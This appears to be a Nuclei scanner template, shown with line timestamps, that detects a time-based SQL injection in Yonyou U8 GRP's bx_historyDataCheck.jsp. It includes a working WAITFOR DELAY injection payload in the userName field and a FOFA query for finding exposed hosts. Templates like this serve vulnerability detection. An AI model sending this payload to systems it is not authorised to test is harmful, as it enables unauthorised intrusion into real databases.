2023-09-27 11:22:56 +00:00
|
|
|
id: yonyou-u8-sqli
|
|
|
|
|
|
|
|
|
|
info:
|
2023-10-03 06:49:44 +00:00
|
|
|
name: Yonyou U8 bx_historyDataCheck - SQL Injection
|
2023-09-27 11:22:56 +00:00
|
|
|
author: xianke
|
|
|
|
|
severity: high
|
|
|
|
|
description: |
|
|
|
|
|
Yonyou U8 Grp contains a SQL injection vulnerability.
|
|
|
|
|
reference:
|
|
|
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
|
|
|
|
|
- https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 2
|
|
|
|
|
fofa-query: icon_hash="-299520369"
|
2023-09-27 11:22:56 +00:00
|
|
|
tags: yonyou,grp,sqli
|
|
|
|
|
|
2024-06-23 05:19:54 +00:00
|
|
|
flow: http(1) && http(2)
|
|
|
|
|
|
|
|
|
|
|
2023-09-27 11:22:56 +00:00
|
|
|
http:
|
|
|
|
|
- raw:
|
2023-10-03 12:29:56 +00:00
|
|
|
- |
|
|
|
|
|
GET /login.jsp HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
2024-06-23 05:19:54 +00:00
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- 'GRP-U8'
|
|
|
|
|
internal: true
|
|
|
|
|
|
|
|
|
|
- raw:
|
2023-09-27 11:22:56 +00:00
|
|
|
- |
|
2024-06-23 05:19:54 +00:00
|
|
|
@timeout: 20s
|
2023-09-27 11:22:56 +00:00
|
|
|
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
|
|
userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
2023-10-03 12:33:45 +00:00
|
|
|
- 'duration_2>=6'
|
2024-06-23 05:19:54 +00:00
|
|
|
- 'contains(content_type, "text/html")'
|
2023-09-27 11:22:56 +00:00
|
|
|
condition: and
|
2024-06-25 10:24:38 +00:00
|
|
|
# digest: 490a00463044022018a831ee808815f7db76929071f0abf9cbc87d7f1cb1a3bde8b7ca207ca63989022067bb75d7338132fe1d67b812ff28e436085abcffa761e98ea2337410cb5f8150:922c64590222798bb761d5b6d8e72950
|
